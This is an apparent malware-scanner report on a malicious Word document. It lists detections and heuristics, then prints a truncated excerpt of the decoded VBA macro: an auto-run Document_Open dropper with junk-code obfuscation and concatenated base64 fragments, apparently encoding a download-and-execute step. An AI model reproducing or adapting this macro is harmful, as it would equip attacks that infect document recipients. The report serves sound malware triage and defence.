MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute code. This indicates an attempt to download and run a secondary payload. The ClamAV heuristic also flags this as a macro-based obfuscation malware. The embedded URL, though benign, is noted.
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6332451-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19760 bytes |
SHA-256: b91b29f4669c3774e45011ddec97f57d75fa5e547d2c6dd23b3f451322b9684a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim HLYbC
HLYbC = Array("v4A30J", "LLc2yDwWt")
YVqjg6 = HLYbC(1)
Dim HXwDT4ovM
HXwDT4ovM = Array("PSM72pRU6", "h3mQoG6N", "Jkts1")
jrKMD = HXwDT4ovM(1)
Mn2NSqQ9 = "2N5bDdkS"
Do1GrfH = "Eo1ZXlSM1pXSmpiR2xsYm5RdVJHOTNibXh2WVdSR2FXeGxLQ1J0ZVhWeWJDNVViMU4wY21sdVp5Z3BMQ0FrY0dGMGFDazdVM1JoY25RdFVISnZZMlZ6Y3l"
Omc0E64X = "Ba2NHRjBhRHRpY21WaGF6dDlZMkYwWTJoN2ZYMD0="
If Len("t6kYxU7JB") <> 181 Then
' nlUg8r
Else
' pDEr4p
MsgBox "QtPweZ", 64, "tZXRcgV"
End If
Dim LRExe5
LRExe5 = Array("fHRkT8")
eYduk = LRExe5(0)
Dim FYk6q
FYk6q = Array("KpMQTwaye")
BtX8d2SCg = FYk6q(0)
Dim s3jW46
s3jW46 = Mn2NSqQ9 & Do1GrfH & Omc0E64X
CrvN6j = "WTIxa0lDOXJJSE5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ"
YKCs2LQqg = "1gxTklSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYMUJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04w"
zG1aO = "SUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVNUzQ1Tmk0eU5Ea3VNakF4TDNCakxuVndKeTVUY0d4cGRDZ25MQ2NwT3lSd1lYUm9JRDBnSkdWdWRqcDBaVzF3SUNzZ0oxeCtkRzF3TG1WNFpTYzdabTl5WldGamFDZ2tiWGwxY213Z2FXNGdKRzE1ZFhKc"
Dim zbuKhV
zbuKhV = Array("qcU5w")
z3BRsK0 = zbuKhV(0)
If Len("wdaUs8fI") <> 163 Then
' TzUP3HdR
Else
' P8gGo
MsgBox "RWELQb7", 22, "ljeOY"
End If
Dim iZvYI
iZvYI = Array("fby2jtv")
DuGhMpJ = iZvYI(0)
Dim zbeIcwkdV
zbeIcwkdV = Array("oIw1oOsM", "ocGLh")
KJfKcUdHO = zbeIcwkdV(1)
Dim u4Yg53X1s
u4Yg53X1s = CrvN6j & YKCs2LQqg & zG1aO
Dim j8FWPm
j8FWPm = Array("lWKIYk")
wlqbJ = j8FWPm(0)
JMfa6ud = u4Yg53X1s & s3jW46
Dim H0FCE
H0FCE = Array("UUKvzhE")
v9hXK = H0FCE(0)
Dim VYVIFXTi
VYVIFXTi = Array("mEBneI", "g1Ovt")
OxhT4Y58H = VYVIFXTi(0)
Dim wL27osq
wL27osq = Array("ZQ5H4yi", "MgPsKLy9")
Zkts6 = wL27osq(1)
Dim XAcn2SBEo
XAcn2SBEo = Array("cHGFt5MTg", "G6Zau2Jwo")
bI3MKsQ9 = XAcn2SBEo(1)
Dim oc1jSvk
oc1jSvk = Array("HIBfgm", "TpGL5y9", "Ec7QsJL")
Osp29 = oc1jSvk(2)
Dim IEKb5
IEKb5 = Array("pOjSQr2UH")
cHglGXfE = IEKb5(0)
sex JMfa6ud
End Sub
Attribute VB_Name = "xpQq2"
Sub sex(nGNz4H)
Dim bIFTSvJg
bIFTSvJg = Array("L5yAmY4Oh", "kaU1Ep")
T3ntfQd = bIFTSvJg(1)
Dim DBCtW
DBCtW = Array("TfOdBN7E", "RctJ74OT")
EB7XGUyMj = DBCtW(1)
Dim ZJoZeF8t
ZJoZeF8t = Array("dWbdD", "FpBmcQ", "NrkKR")
pJiHW = ZJoZeF8t(0)
If Len("iXrQv") <> 251 Then
' orlu6Dbo
Else
' q6ky5wl
MsgBox "rvMTG", 50, "LeOBD"
End If
Dim zgZlT
zgZlT = Array("m7D12Nz", "NjfFE5C6")
p5vidNfE1 = zgZlT(1)
Dim xIBwZnMy6
xIBwZnMy6 = Array("K1HasfM")
W8WYe = xIBwZnMy6(0)
Dim gf52o
gf52o = Array("eTrtI", "Xikqz3JFg")
n3YPdX = gf52o(0)
Dim Q83ASoq
Q83ASoq = Array("sBALHq", "NkD0cif")
IAxXa = Q83ASoq(0)
Dim xholxz1Z
xholxz1Z = Array("LJDOerbzp", "Lq4kX", "vOQJgpjlI")
iGMao = xholxz1Z(1)
Dim TSNMZCy
TSNMZCy = Array("RBVLW0D")
fsoZVGmQR = TSNMZCy(0)
Dim Tnhw5d
Tnhw5d = Array("oLJn68cQ", "DEtAdZDlH")
CdAZxnEjm = Tnhw5d(1)
Dim wd1Cj
wd1Cj = Array("WLPaTOc2", "pBxpL", "tgJ9dV")
c8WAh = wd1Cj(1)
Dim ivDxB
ivDxB = Array("c9DJ14Oo")
e5hjsW = ivDxB(0)
Dim pRQNr0
pRQNr0 = Array("j9OxlJk", "J8FUlcLKo")
TtLzjPuIS = pRQNr0(1)
Dim xzg5T
xzg5T = Array("YtgiTZlU", "a9oaAJ6CU")
a6vo2 = xzg5T(1)
Dim s9vUx
s9vUx = Array("V6YHX", "vb4gQeDM9")
zawNfYeB = s9vUx(1)
If Len("OeiEkS6A") <> 226 Then
' dRvXf9Ed8
Else
' SveSz
MsgBox "cfSdt", 43, "qMq5SP"
End If
Dim VVHpXrYz
VVHpXrYz = Array("rlXe1IR", "bUFJ2Oca", "rOC3kKT")
Ga2PMWHl = VVHpXrYz(2)
If Len("yLUp6t3mq") <> 189 Then
' u3t6Zf
Else
' RDkLjVPx
MsgBox "Z4OqCwWhr", 17, "Wqnxspb"
End If
Dim hlq75wdht
hlq75wdht = Array("zWlqUAa", "p23C9fFA5", "bAM1OP")
AnkQGD2Bx = hlq75wdht(0)
Dim SD9YWAo
SD9YWAo = Array("khmWqgLU6", "n3u7IQ")
GCwgis = SD9YWAo(0)
Dim omTJlb
omTJlb = Array("lDtT10fk4", "DzhUQvc0", "xKHYvlJ")
bY3a1cfiE = omTJlb(0)
Dim djVBa
djVBa = Array("DkrtEc")
KLB0Z = djVBa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.